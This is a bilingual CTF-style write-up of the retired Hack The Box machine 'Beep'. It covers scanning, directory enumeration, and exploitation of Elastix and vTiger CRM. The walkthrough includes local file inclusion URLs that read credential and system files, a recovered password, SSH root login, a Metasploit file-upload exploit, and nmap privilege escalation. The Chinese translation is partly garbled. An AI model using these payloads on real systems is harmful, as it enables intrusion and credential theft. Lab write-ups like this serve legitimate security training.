推箱子2-向右推!_保持冷靜并砍箱子-嗶

推箱子2-向右推!

Hack The Box (HTB) is an online platform allowing you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them simulating real world scenarios and some of them leaning more towards a CTF style of challenge.

Hack The Box(HTB)是一個在線平臺，可讓您測試滲透測試技能。它包含一些不斷更新的挑戰。其中一些模擬現實世界的場景，而另一些則更傾向于CTF的挑戰風格。

Note. Only write-ups of retired HTB machines are allowed.

注意。 只允許注銷HTB機器。

Beep is described as having a very large list of running services, which can make it a bit challenging to find the correct entry method. The machine can be a little overwhelming for some as there are many potential attack vectors

Beep被描述為具有大量正在運行的服務，這可能會使查找正確的輸入方法變得有些挑戰。由于存在許多潛在的攻擊媒介，因此該機器可能有些不堪一擊

We will use the following tools to pawn the box on a Kali Linux box

我們將使用以下工具將盒子當成Kali Linux盒子

nmap
納帕
zenmap
禪地圖
dirbuster
迪斯特
searchsploit
searchsploit
metasploit
元胞

第1步-掃描網絡 (Step 1 - Scanning the network)

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

開發機器之前的第一步是進行一些掃描和偵察。

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on that phase to get as much information as possible.

這是最重要的部分之一，因為它將決定您以后可以嘗試利用的內容。最好在該階段花費更多時間以獲取盡可能多的信息。

I will use Nmap (Network Mapper), which is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

我將使用Nmap (網絡映射器)，這是一個免費的開源實用程序，用于網絡發現和安全審核。它使用原始IP數據包來確定網絡上可用的主機，這些主機提供的服務，它們正在運行的操作系統，使用的數據包過濾器/防火墻的類型以及許多其他特征。

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

此工具可以使用許多命令來掃描網絡。如果您想了解更多信息，可以在這里查看文檔。

I use the following command to get a basic idea of what we are scanning

我使用以下命令來了解我們正在掃描的內容

nmap -sV -O -F --version-light 10.10.10.7

-sV: Probe open ports to determine service/version info

-sV：探測打開的端口以確定服務/版本信息

-O: Enable OS detection

-O：啟用操作系統檢測

-F: Fast mode - Scan fewer ports than the default scan

-F：快速模式-掃描的端口少于默認掃描

--version-light: Limit to most likely probes (intensity 2)

--version-light：限制為最可能的探測(強度2)

10.10.10.7: IP address of the Beep box

10.10.10。 7 ：提示音框的IP地址

You can also use Zenmap, which is the official Nmap Security Scanner GUI. It is a multi-platform, free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users.

您還可以使用Zenmap ，這是官方的Nmap Security Scanner GUI。它是一個多平臺，免費和開源的應用程序，旨在使Nmap易于初學者使用，同時為經驗豐富的Nmap用戶提供高級功能。

I use a different set of commands to perform an intensive scan

我使用一組不同的命令來執行密集掃描

nmap -A -v 10.10.10.7

-A: Enable OS detection, version detection, script scanning, and traceroute

-A：啟用操作系統檢測，版本檢測，腳本掃描和跟蹤路由

-v: Increase verbosity level

-v：提高詳細程度

10.10.10.7: IP address of the Beep box

10.10.10.7：提示框的IP地址

If you find the results a little bit too overwhelming, you can move to the Ports/Hosts tab to only get the open ports.

如果發現結果有點不堪重負，則可以移至“ 端口/主機”選項卡以僅獲取打開的端口。

We can see that there are 12 open ports:

我們可以看到有12個開放端口：

Port 22. Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

端口 22 。安全Shell(SSH)，安全登錄，文件傳輸(scp，sftp)和端口轉發

Port 25. Simple Mail Transfer Protocol (SMTP) used for email routing between mail servers

端口 25 。簡單郵件傳輸協議(SMTP)用于郵件服務器之間的電子郵件路由

Port 80. Hypertext Transfer Protocol (HTTP). Here it's an Apache httpd 2.2.3

端口 80 。超文本傳輸??協議(HTTP)。這是Apache httpd 2.2.3

Port 110. Post Office Protocol, version 3 (POP3)

端口 110 。郵局協議，版本3(POP3)

Port 111. Open Network Computing Remote Procedure Call (ONC RPC, sometimes referred to as Sun RPC)

端口 111 。開放網絡計算遠程過程調用( ONC RPC ，有時也稱為Sun RPC )

Port 143. Internet Message Access Protocol (IMAP), management of electronic mail messages on a server

端口 143 。 Internet郵件訪問協議(IMAP)，管理服務器上的電子郵件

Port 443. Hypertext Transfer Protocol over TLS/SSL (HTTPS)

端口 443 。 TLS / SSL(HTTPS)上的超文本傳輸??協議

Port 993. Internet Message Access Protocol over TLS/SSL (IMAPS)

端口 993 。 TLS / SSL上的Internet消息訪問協議(IMAPS)

Port 995. Post Office Protocol 3 over TLS/SSL (POP3S)

995 端口 。 TLS / SSL(POP3S)上的郵局協議3

Port 3306. MySQL database system

端口 3306 。 MySQL數據庫系統

Port 4445. I2P HTTP/S proxy

端口 4445 。 I2P HTTP / S代理

Port 10000. Webmin, Web-based Unix/Linux system administration tool (default port)

端口 10000 。 Webmin，基于Web的Unix / Linux系統管理工具(默認端口)

Nmap finds quite a long list of services. For now, Apache, which is running on ports 80 and 443, will be the primary target.

Nmap找到了很長的服務列表。目前，運行在端口80和443上的Apache將成為主要目標。

步驟2-列舉目錄 (Step 2 - Enumerating the directories)

Still in the scanning and reconnaissance phase, I now use DirBuster. DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. ?

仍處于掃描和偵察階段，我現在使用DirBuster 。 DirBuster是一個多線程Java應用程序，旨在暴力破解Web /應用程序服務器上的目錄和文件名。

You can launch DirBuster by typing this command on the terminal

您可以通過在終端上鍵入此命令來啟動DirBuster

dirbuster

or by searching the application

或通過搜索應用程序

The application looks like this, where you can specify the target URL. In our case it will be https://10.10.10.7. You can select a file with the list of dirs/files by clicking the Browse button

該應用程序如下所示，您可以在其中指定目標URL。在我們的情況下，它將是https://10.10.10.7 。您可以通過單擊“瀏覽”按鈕選擇帶有目錄/文件列表的文件。

I use the directory-list-2.3-medium.txt for this search

我使用directory-list-2.3-medium.txt進行此搜索

DirBuster finds a huge list of directories with several content management systems and open source applications. There are several vulnerabilities that can lead to shell amongst the results.

DirBuster可以找到包含多個內容管理系統和開源應用程序的大量目錄。結果中有幾個漏洞可能導致脫殼。

第3步-訪問網站 (Step 3 - Visiting the website)

Let's try port 80 and visit http://10.10.10.7

讓我們嘗試端口80并訪問http://10.10.10.7

The website is redirected to https://10.10.10.7 and we need to add a security exception to the website to continue

網站被重定向到https://10.10.10.7，我們需要向網站添加安全例外才能繼續

We finally land on the website which is an Elastix Login Portal. Elastix is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialling

我們最終登陸了Elastix登錄門戶網站 。 Elastix是統一的通信服務器軟件，它將IP PBX，電子郵件，IM，傳真和協作功能集成在一起。它具有Web界面，并包括諸如具有預測性撥號功能的呼叫中心軟件之類的功能。

An IP PBX ("Internet Protocol private branch exchange") is a system that connects telephone extensions to the public switched telephone network (PSTN) and provides internal communication for a business

IP PBX (“ Internet協議專用小交換機”)是將電話分機連接到公用電話交換網(PSTN)并為企業提供內部通信的系統

If you want to learn more about Elastix, you can have a look here

如果您想了解有關Elastix的更多信息，可以看看在這里

I try the default credentials, but it doesn't seem to work

我嘗試使用默認憑據，但似乎不起作用

Username: admin
Password: palosanto

Having a look at the source code doesn't help either

查看源代碼也無濟于事

I will use Searchsploit to check if there's any known vulnerability on Elastix. Searchsploit is a command line search tool for Exploit Database

我將使用Searchsploit來檢查Elastix上是否存在任何已知漏洞。 Searchsploit是漏洞數據庫的命令行搜索工具

I use the following command

我使用以下命令

searchsploit elastix

We can see several vulnerabilities, but we will examine the 'graph.php' Local File Inclusion with this command

我們可以看到幾個漏洞，但是我們將使用此命令檢查“ graph.php”本地文件包含

searchsploit -x 37637.pl

We have a summary of the exploit and the code

我們對漏洞利用和代碼進行了總結

The LFI Exploit is the following

LFI漏洞利用如下

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS)

攻擊者可以使用本地文件包含(LFI)來欺騙Web應用程序以在Web服務器上公開或運行文件。 LFI攻擊可能導致信息泄露，遠程代碼執行甚至跨站點腳本(XSS)

You can also check the Exploit Database to find the exploit

您還可以檢查漏洞利用數據庫以找到漏洞利用

You will get the same results as on the terminal. If you navigate to the 2.0 - 'graph.php' Local File Inclusion, you will have a description of the exploit

您將獲得與終端上相同的結果。如果導航到2.0-'graph.php'本地文件包含 ，則將有關于漏洞利用的描述

If you remember from step 2, the directory enumeration flagged a vTiger CRM.

如果您還記得第2步中的內容 ，則目錄枚舉標記為vTiger CRM 。

vTiger CRM is an integrated customer relationship management (CRM) application that can be used on the Intranet or from the Internet using a browser. It is distributed under a free license

vTiger CRM是一個集成的客戶關系管理(CRM)應用程序，可以在Intranet上或使用瀏覽器從Internet使用。它是根據免費許可證分發的

If you want to learn more about vTiger CRM, you can have a look here

如果您想了解有關vTiger CRM的更多信息，可以看看在這里

You can also read more about the integration between Elastix and vTigerCRM here

您還可以在此處閱讀有關Elastix和vTigerCRM之間集成的更多信息。

步驟4-嘗試elastix LFI利用 (Step 4 - Trying the elastix LFI exploit)

Let's navigate to

讓我們導航到

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

If you can't read anything, you can prettify the file by checking the source file

如果您無法閱讀任何內容，則可以通過檢查源文件來美化文件

I find a password jEhdIekWmdjE

我找到密碼jEhdIekWmdjE

If you remember from step 1, the nmap scan flagged port 22 as opened, let's try the newly found password on it

如果您還記得第1步中的 ，nmap掃描將端口22標記為已打開，讓我們嘗試在其上新找到的密碼

第5步-連接到SSH (Step 5 - Connecting to SSH)

Let's connect to the SSH with the following command

讓我們使用以下命令連接到SSH

ssh root@10.10.10.7

I try the password and I'm in!

我嘗試輸入密碼，然后進入！

第6步-尋找root.txt標志 (Step 6 - Looking for the root.txt flag)

I can now look for the first flag, root.txt

我現在可以查找第一個標志root.txt

I use the following command to check who am I on this machine

我使用以下命令來檢查我是誰

whoami

I have root access to the machine. I got the power!

我具有對該計算機的root訪問權限。我有力量！

I use the following command to check where I am on the machine

我使用以下命令檢查我在機器上的位置

pwd

I'm in /root and by doing

我在/ root并通過

ls

I find the root.txt file! To read the content of the file I use the command

我找到了root.txt文件！要讀取文件的內容，請使用以下命令

cat root.txt

Now that we have the root flag, let's find the user flag!

現在我們有了root標志，讓我們找到用戶標志！

步驟7-尋找user.txt標志 (Step 7 - Looking for the user.txt flag)

I need to navigate back to the home directory by doing

我需要通過導航回到主目錄

cd home

I then list all the files/folders and see there's a folder called fanis

然后，我列出所有文件/文件夾，然后看到有一個名為fanis的文件夾

I navigate to this folder with

我導航到該文件夾

cd fanis

And when I list the files/folders, I can see the user.txt file!

當我列出文件/文件夾時，我可以看到user.txt文件！

To read the content of the file I use the command

要讀取文件的內容，請使用以下命令

cat user.txt

Congrats! You found both flags!

恭喜！您找到了兩個標志！

Variations for Informational findings

信息發現的變化

步驟3b-訪問網站 (Step 3b - Visiting the website)

Let's navigate to

讓我們導航到

https://10.10.10.7/vtigercrm/

We can see the version of the application: vTiger CRM 5.1.0

我們可以看到該應用程序的版本： vTiger CRM 5.1.0

I will use Searchsploit to check if there's any known vulnerability on vTigerCRM

我將使用Searchsploit來檢查vTigerCRM上是否存在任何已知漏洞

I use the following command

我使用以下命令

searchsploit vtiger

We can see several vulnerabilities. I examine the Local File Inclusion with this command

我們可以看到幾個漏洞。我使用此命令檢查本地文件包含

searchsploit -x 18770.txt

I have a summary of the exploit and the code

我對漏洞利用和代碼進行了總結

The LFI Exploit is the following

LFI漏洞利用如下

/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

You can also check the exploit database to find the exploit

您還可以檢查漏洞利用數據庫以找到漏洞利用

You will get the same results on the terminal. If you navigate to the vTiger 5.1.0 - Local File Inclusion, you will have a description of the exploit

您將在終端上獲得相同的結果。如果導航到vTiger 5.1.0-包含本地文件 ，則將有關于此漏洞利用的描述

步驟4b-對vTiger Asterisk默認憑據進行更多檢查 (Step 4b - Doing more recon around the vTiger Asterisk default credentials)

Let's navigate to

讓我們導航到

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

If you can't read anything, you can prettify the file by checking the source file

如果您無法閱讀任何內容，則可以通過檢查源文件來美化文件

I also do some research on default credentials for vTiger and find some documentation around installing vTiger Asterisk Connector

我還對vTiger的默認憑據進行了一些研究，并找到了一些有關安裝vTiger Asterisk Connector的文檔。

If we modify the previous URL to

如果我們將先前的網址修改為

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00

I navigate to this page (using source code to prettify the output)

我導航到此頁面(使用源代碼修飾輸出)

I find a password jEhdIekWmdjE

我找到密碼jEhdIekWmdjE

You can continue to Step 5 from there

您可以從那里繼續執行步驟5

Variations using Metasploit, meterpreter, nmap --interactive and Burp

使用Metasploit，meterpreter，nmap --interactive和Burp的變體

步驟3c-訪問網站 (Step 3c - Visiting the website)

We know that the version of the application is vTiger CRM 5.1.0

我們知道該應用程序的版本是vTiger CRM 5.1.0

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders

我們將使用Metasploit ，它是一種滲透測試框架，可使黑客攻擊變得簡單。對于許多攻擊者和防御者來說，這是必不可少的工具

I launch Metasploit Framework on Kali and look for command I should use to launch the exploit

我在Kali上啟動Metasploit框架 ，并尋找啟動漏洞利用程序所需的命令

I find an interesting payload, number 3

我發現一個有趣的有效載荷，編號3

exploit/multi/http/vtiger_soap_upload

This is the description of the exploit

這是漏洞利用的描述

vTiger CRM allows an user to bypass authentication when requesting SOAP services. In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP service. By combining both vulnerabilities an attacker can upload and execute PHP code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu 10.04 and Windows 2003 SP2.

vTiger CRM允許用戶在請求SOAP服務時繞過身份驗證。另外，可以通過AddEmailAttachment SOAP服務上載任意文件。通過結合這兩個漏洞，攻擊者可以上載和執行PHP代碼。此模塊已在Ubuntu 10.04和Windows 2003 SP2的vTiger CRM v5.4.0上成功測試。

I use the following command for the exploit

我使用以下命令進行攻擊

use exploit/multi/http/vtiger_soap_upload

I need to set up several options before launching the exploit

啟動漏洞之前，我需要設置幾個選項

I start by setting the RHOSTS with the following command

我首先使用以下命令設置RHOSTS

set RHOSTS 10.10.10.7/32

I set the SSL and the RPORT with

我將SSL和RPORT設置為

set SSL true

and

和

set RPORT 443

I run the exploit, but I need to set the correct LPORT this time with

我運行了漏洞利用程序，但是這次我需要設置正確的LPORT

set LPORT 10.10.14.10

Here is a sum up of all the commands

這是所有命令的總結

I check the options

我檢查選項

I run the exploit with the command

我用命令運行漏洞

run

I get this error message

我收到此錯誤消息

I set up the proxy with the following command

我使用以下命令設置代理

set proxies http:127.0.0.1:8080

I check the options again

我再次檢查選項

I run the exploit but I get a new error message

我運行了漏洞利用程序，但收到了新的錯誤消息

I set it with this command

我用這個命令設置

set ReverseAllowProxy true

I also need to set up Burp to proxy the exploit.

我還需要設置Burp來代理漏洞利用。

Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps identify vulnerabilities and verify attack vectors that are affecting web applications

Burp Suite是基于Java的Web滲透測試框架。它已成為信息安全專業人員使用的行業標準工具套件。 Burp Suite幫助識別漏洞并驗證影響Web應用程序的攻擊媒介

You can learn more on the official website here

您可以在官方網站上了解更多信息

Open Burp and set the target to the website in Target > Scope > Target Scope > Include in scope > edit

打開打p并在目標>范圍>目標范圍>包含在范圍>編輯中將目標設置為網站

I run the exploit on Metasploit and go back to Burp. I can see Burp intercepted the request

我在Metasploit上運行了漏洞利用程序，然后回到Burp 。我可以看到Burp截獲了請求

I set the Intercept option to off

我將攔截選項設置為關閉

Back on Metasploit, I finally get a Meterpreter session

回到Metasploit上 ，我終于參加了Meterpreter會議

From the Offensive Security website, we get this definition for Meterpreter

從“ 進攻性安全”網站上，我們獲得了Meterpreter的定義

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Meterpreter是一種高級的，動態可擴展的有效負載，它使用內存中的 DLL注入暫存器，并在運行時通過網絡進行了擴展。它通過暫存器套接字進行通信，并提供全面的客戶端Ruby API。它具有命令歷史記錄，制表符完成，通道等功能。

You can read more about Meterpreter here.

您可以在此處閱讀有關Meterpreter的更多信息。

步驟4c-尋找user.txt標志 (Step 4c - Looking for the user.txt flag)

I navigate to the root directory to find the home folder. I then move to the home directory with

我導航到根目錄以找到主文件夾。然后，我使用

cd home

You can list files/folder with

您可以使用列出文件/文件夾

ls -la

I find a folder called fanis. Let's see what's inside with

我找到一個名為fanis的文件夾。讓我們看看里面有什么

cd fanis

I list all files/folders and I find the user.txt flag. To read the content of the file I use the command

我列出了所有文件/文件夾，并找到了user.txt標志。要讀取文件的內容，請使用以下命令

cat user.txt

Now that we have the user flag, let's find the root flag!

現在有了用戶標志，讓我們找到根標志！

步驟5c-尋找root.txt標志 (Step 5c - Looking for the root.txt flag)

I can't access the root folder, but I can create a shell with the command

我無法訪問根文件夾，但是可以使用以下命令創建外殼

shell

If I check who I am on the machine, I get

如果我檢查我在機器上的身份，我會得到

If you do

如果你這樣做

sudo -l

you can see many NOPASSWD commands which can lead us to getting root

您會看到許多NOPASSWD命令，這些命令可以導致我們扎根

Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. ?Since Nmap is in the list of binaries that is executed with root privileges it is possible to use the interactive console in order to run a shell with the same privileges

Nmap的較早版本(2.02至5.21)具有交互模式，該模式允許用戶執行Shell命令。由于Nmap在以root特權執行的二進制文件列表中，因此可以使用交互式控制臺來以相同的特權運行shell

Let's try it with the following command

讓我們用以下命令嘗試一下